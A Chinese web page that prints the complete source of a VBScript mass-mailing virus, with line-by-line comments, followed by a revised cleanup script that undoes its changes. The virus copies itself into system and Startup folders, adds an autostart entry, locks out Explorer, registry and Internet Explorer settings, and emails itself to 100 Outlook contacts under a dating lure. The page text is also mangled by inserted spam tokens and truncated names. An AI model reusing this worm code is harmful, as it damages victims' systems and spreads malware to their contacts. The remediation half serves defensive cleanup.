
vbs病毒代码


vbs病毒代碼 2007-07-11 21:26 on error resume next

set fs=createobject("ing.fileSEO靠我systemobject" 创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作

set dir1=fs.getspecialfolder(0) 获取windows/winnt文件夹位SEO靠我

set dir2=fs.getspecialfolder(1) 获取system32/system文件夹位置

set so=createobject("ing.filesystemobject"

dimSEO靠我 r 定义一个变量

set r=createobject("w.shell"

so.getfile(w.fullname).copy(dir1&"/win32system.vbs" 复制病毒副本到windSEO靠我ows/winnt文件夹位置

so.getfile(w.fullname).copy(dir2&"/win32system.vbs" 复制病毒副本到system32/system文件夹位置

so.getfSEO靠我ile(w.fullname).copy(dir1&"/start menu/programs/启动/win32system.vbs" 复制病毒副本到start menu启动菜单

下面是对注册表的恶意修改和简单的依靠oe传播

r.regwrite "hkcu/software/microsoft/windows/currentversion/policies/explorer/norun",1,"reSEO靠我g_dword" 修改注册表,禁止“运行”菜单

r.regwrite "kcu/software/microsoft/windows/currentversion/policies/explorer/nSEO靠我oclose",1,"reg_dword" 修改注册表,禁止“关闭”菜单

r.regwrite "hkcu/software/microsoft/windows/currentversion/policSEO靠我ies/explorer/nodrives",63000000,"reg_dword" 修改注册表,隐藏所有逻辑盘符

r.regwrite "hkcu/software/microsoft/windowSEO靠我s/currentversion/policies/system/disableregistrytools",1,"reg_dword" 修改注册表,禁止注册表编辑

r.regwrite "hklm/sSEO靠我oftware/microsoft/windows/currentversion/run/scanregistry","" 修改注册表,禁止开机注册表扫描

r.regwrite "hkcu/softwaSEO靠我re/microsoft/windows/currentversion/policies/explorer/nologoff",1,"reg_dword" 修改注册表,禁止“注销”菜单

r.regwriSEO靠我te "hkcu/software/microsoft/windows/currentversion/policies/winoldapp/norealmode",1,"reg_dword" 修改注册SEO靠我表,禁止ms-dos实模式

r.regwrite "hklm/software/microsoft/windows/currentversion/run/win32system","win32systeSEO靠我m.vbs" 修改注册表,使这个脚本本身开机自动运行

r.regwrite "hkcu/software/microsoft/windows/currentversion/policies/explorSEO靠我er/nodesktop",1,"reg_dword" 修改注册表,禁止显示桌面图标

r.regwrite "hkcu/software/microsoft/windows/currentversionSEO靠我/policies/winoldapp/disabled",1,"reg_dword" 修改注册表,禁止纯dos模式

r.regwrite "hkcu/software/microsoft/windowSEO靠我s/currentversion/policies/explorer/nosettaskbar",1,"reg_dword" 修改注册表,禁止“任务栏和开始”菜单

r.regwrite "hkcu/soSEO靠我ftware/microsoft/windows/currentversion/policies/explorer/noviewcontextmenu",1,"reg_dword" 修改注册表,禁止右SEO靠我键菜单

r.regwrite "hkcu/software/microsoft/windows/currentversion/policies/explorer/nosetfolders",1,"regSEO靠我_dword" 修改注册表,禁止控制面板

r.regwrite "hklm/software/classes/.reg/","txtfile" 修改注册表,禁止导入使用.reg文件,改为用txt文件的关SEO靠我

r.regwrite "hklm/software/microsoft/windows/currentversion/winlogon/legalnoticecaption","警告" 设置开机提示SEO靠我框标题

r.regwrite "hklm/software/microsoft/windows/currentversion/winlogon/legalnoticetext","您中vbs脚本病毒了,SEO靠我哭吧~" 设置开机提示框文本内容

set ol=createobject("outlook.application" 创建outlook文件对象用于传播

on error resume next

for xSEO靠我=1 to 100

set mail=ol.createitem(0)

mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) 用SEO靠我于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~

mail.subject="今晚你来吗?" 邮件主题

mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情SEO靠我况请阅读随信附件,祝您好运! 同城约会网" 邮件内容

mail.attachments.add(dir2&"win32system.vbs"

mail.send

next

ol.quit

下面是对internet explorer选项的恶意修改

r.regwrite "hkcu/software/policies/microsoft/internet explorer/restrictions/nobrowsSEO靠我ercontextmenu",1,"reg_dword" 修改注册表,禁止鼠标右键

r.regwrite "hkcu/software/policies/microsoft/internet exploSEO靠我rer/restrictions/nobrowseroptions",1,"reg_dword" 修改注册表,禁止internet选项

r.regwrite "hkcu/software/policieSEO靠我s/microsoft/internet explorer/restrictions/nobrowsersaveas",1,"reg_dword" 修改注册表,禁止“另存为”

r.regwrite "hSEO靠我kcu/software/policies/microsoft/internet explorer/restrictions/nofileopen",1,"reg_dword" 修改注册表,禁止“文件SEO靠我/打开”菜单

r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/advanced",1,"reg_SEO靠我dword" 修改注册表,禁止更改高级页设置

r.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/cSEO靠我ache internet",1,"reg_dword" 修改注册表,禁止更改临时文件设置

r.regwrite "hkcu/software/policies/microsoft/internet eSEO靠我xplorer/control panel/autoconfig",1,"reg_dword" 修改注册表,禁止更改自动配置

r.regwrite "hkcu/software/policies/micSEO靠我rosoft/internet explorer/control panel/homepage",1,"reg_dword" 修改注册表,禁止更改主页,即“主页”变灰

r.regwrite "hkcu/SEO靠我software/policies/microsoft/internet explorer/control panel/history",1,"reg_dword" 修改注册表,禁止更改历史记录设置

rSEO靠我.regwrite "hkcu/software/policies/microsoft/internet explorer/control panel/connwiz admin lock",1,"rSEO靠我eg_dword" 修改注册表,禁止更改internet连接向导

r.regwrite "hkcu/software/policies/microsoft/internet explorer/contrSEO靠我ol panel/securitytab",1,"reg_dword" 修改注册表,禁止更改安全项

r.regwrite "hkcu/software/policies/microsoft/internSEO靠我et explorer/control panel/resetwebsettings",1,"reg_dword" 修改注册表,禁止“重置web设置”

r.regwrite "hkcu/softwareSEO靠我/policies/microsoft/internet explorer/restrictions/noviewsource",1,"reg_dword" 修改注册表,禁止查看源文件

r.regwriSEO靠我te "hkcu/software/policies/microsoft/internet explorer/infodelivery/restrictions/noaddingsubions",1,SEO靠我"reg_dword" 修改注册表,禁止添加脱机计划

r.regwrite "hkcu/software/microsoft/windows/currentversion/policies/explorSEO靠我er/nofilemenu",1,"reg_dword" 修改注册表,禁止“文件”菜单

下面就是“解药”--恢复文件reset.vbs的源代码:

(由于这里与上面的病毒破坏恶意修改恰好相反,故不做注释了)

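' reset.vbs -- cleanup script for the win32system.vbs sample listed above.
'
' What it does:
'   1. Removes the three dropped copies of win32system.vbs.
'   2. Removes the sample's Run autostart value.
'   3. Sets every Explorer / System / WinOldApp / Internet Explorer policy
'      value the sample wrote back to 0.
'   4. Clears the logon legal-notice caption and text.
'   5. Restores the .reg file association.
'
' Changes against the listing as published:
'   * The published script wrote all three delete commands to the SAME
'     RunOnce value name, so each write replaced the previous one and only
'     the last copy was scheduled for deletion. Files are now deleted
'     directly, and the RunOnce fallback uses one value name per file.
'   * The published script never undid the sample's change to
'     HKLM\Software\Classes\.reg\ (default value set to "txtfile").
'   * The sample's Run value was blanked instead of removed.
'   * One failed write no longer aborts the rest of the cleanup.
'
' NOTE(review): the page prints registry and file paths with "/" and shows
' truncated names ("ing.filesystemobject", "w.shell", "noaddingsubions").
' These look like an artifact of the page's text filtering; they are
' restored here to the standard names. Confirm against an original copy.
'
' Run from an account allowed to write HKLM, otherwise the HKLM steps are
' reported as failed. Explorer policy changes take effect after the next
' logon. The sample also mailed itself through Outlook, which this script
' cannot undo: check Sent Items and warn the recipients.

Const RUNONCE_KEY = "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\"
Const RUN_KEY = "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
Const CV_POLICIES = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\"
Const IE_POLICIES = "HKCU\Software\Policies\Microsoft\Internet Explorer\"
Const WINLOGON_KEY = "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\"

Dim fs, r, dir1, dir2, failures, i, droppedCopies

Set fs = CreateObject("Scripting.FileSystemObject")
Set r = CreateObject("WScript.Shell")
dir1 = fs.GetSpecialFolder(0).Path   ' Windows folder
dir2 = fs.GetSpecialFolder(1).Path   ' System folder
failures = ""

' --- 1. dropped copies ------------------------------------------------------
' The Startup folder name below is the localized one used by the sample; save
' this file in an encoding the script host reads correctly (ANSI or UTF-16).
droppedCopies = Array( _
    dir1 & "\win32system.vbs", _
    dir2 & "\win32system.vbs", _
    dir1 & "\start menu\programs\启动\win32system.vbs")

For i = 0 To UBound(droppedCopies)
    RemoveDroppedCopy droppedCopies(i), i + 1
Next

' --- 2. autostart entries ---------------------------------------------------
RemoveValue RUN_KEY & "win32system"
' The sample blanked the ScanRegistry autostart; put the original command back.
' NOTE(review): scanregw.exe is the value the published script restores and
' looks specific to Windows 9x/Me -- skip this line on other systems.
WriteString RUN_KEY & "ScanRegistry", "scanregw.exe /autorun"

' --- 3. policy values set to 1 (or 63000000 for NoDrives) by the sample -----
ResetPolicies CV_POLICIES & "Explorer\", Array( _
    "NoRun", "NoClose", "NoDrives", "NoLogoff", "NoDesktop", _
    "NoSetTaskbar", "NoViewContextMenu", "NoSetFolders", "NoFileMenu")
ResetPolicies CV_POLICIES & "System\", Array("DisableRegistryTools")
ResetPolicies CV_POLICIES & "WinOldApp\", Array("NoRealMode", "Disabled")
ResetPolicies IE_POLICIES & "Restrictions\", Array( _
    "NoBrowserContextMenu", "NoBrowserOptions", "NoBrowserSaveAs", _
    "NoFileOpen", "NoViewSource")
ResetPolicies IE_POLICIES & "Control Panel\", Array( _
    "Advanced", "Cache Internet", "AutoConfig", "HomePage", "History", _
    "Connwiz Admin Lock", "SecurityTab", "ResetWebSettings")
ResetPolicies IE_POLICIES & "Infodelivery\Restrictions\", _
    Array("NoAddingSubscriptions")

' --- 4. logon legal notice --------------------------------------------------
' NOTE(review): path kept as published; on NT-based Windows these values live
' under "Windows NT\CurrentVersion\Winlogon" instead -- confirm for the host.
WriteString WINLOGON_KEY & "LegalNoticeCaption", ""
WriteString WINLOGON_KEY & "LegalNoticeText", ""

' --- 5. .reg file association -----------------------------------------------
' A trailing backslash addresses the key's default value. "regfile" is the
' stock handler for .reg files; the sample had replaced it with "txtfile".
WriteString "HKLM\Software\Classes\.reg\", "regfile"

If failures <> "" Then
    WScript.Echo "Cleanup finished, but these steps failed:" & failures
End If

' Appends one line to the failure report and clears the pending error.
Sub NoteFailure(what)
    failures = failures & vbCrLf & "  " & what
    Err.Clear
End Sub

' Deletes one dropped copy. If the file is still present afterwards, falls
' back to the published approach (a RunOnce delete command), with a value
' name unique to this file so the entries cannot overwrite each other.
' NOTE(review): the fallback command (start.exe /m deltree) is Windows 9x/Me
' only; on other systems a file that survives here needs manual removal.
Sub RemoveDroppedCopy(path, n)
    On Error Resume Next
    If fs.FileExists(path) Then fs.DeleteFile path, True
    Err.Clear
    If fs.FileExists(path) Then
        r.RegWrite RUNONCE_KEY & "win32system_cleanup" & n, _
            "start.exe /m deltree /y """ & path & """"
        If Err.Number <> 0 Then NoteFailure "delete " & path
    End If
End Sub

' Sets every named REG_DWORD value under keyPath to 0.
Sub ResetPolicies(keyPath, names)
    Dim k
    For k = 0 To UBound(names)
        ClearPolicy keyPath & names(k)
    Next
End Sub

' Writes 0 to a single REG_DWORD policy value and records a failure.
Sub ClearPolicy(valuePath)
    On Error Resume Next
    r.RegWrite valuePath, 0, "REG_DWORD"
    If Err.Number <> 0 Then NoteFailure valuePath
End Sub

' Writes a string (REG_SZ) value and records a failure.
Sub WriteString(valuePath, text)
    On Error Resume Next
    r.RegWrite valuePath, text
    If Err.Number <> 0 Then NoteFailure valuePath
End Sub

' Deletes a value. RegDelete raises an error when the value does not exist,
' so a missing value is treated as already clean rather than as a failure.
Sub RemoveValue(valuePath)
    On Error Resume Next
    r.RegDelete valuePath
    Err.Clear
End Sub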